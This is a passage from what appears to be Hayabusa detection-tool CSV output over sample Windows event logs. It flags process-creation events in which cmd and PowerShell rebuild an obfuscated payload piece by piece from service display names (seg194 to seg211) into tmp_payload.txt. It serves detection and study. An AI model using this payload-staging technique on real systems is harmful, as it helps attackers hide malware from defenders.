+00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:09.644 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:09.644 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:09.644 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:11.108 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:11.124 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:11.124 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:12.598 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:12.598 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:12.598 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:14.049 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:14.065 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:14.065 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:15.496 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:15.511 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:15.511 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:16.954 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:16.954 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:16.954 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:18.401 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:18.401 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:18.401 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:19.854 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:19.869 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:19.869 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:21.305 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:21.305 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:21.305 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:22.769 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:22.769 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:22.769 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:24.239 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x32c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:24.239 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:24.239 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:25.692 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:25.708 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:25.708 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:27.141 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:27.157 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:27.157 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:28.605 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:28.605 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:28.605 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:30.058 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:30.074 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x704 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:30.074 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:31.535 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:31.535 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:31.535 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:32.988 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:32.988 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:32.988 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:34.429 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:34.429 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:34.429 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:35.880 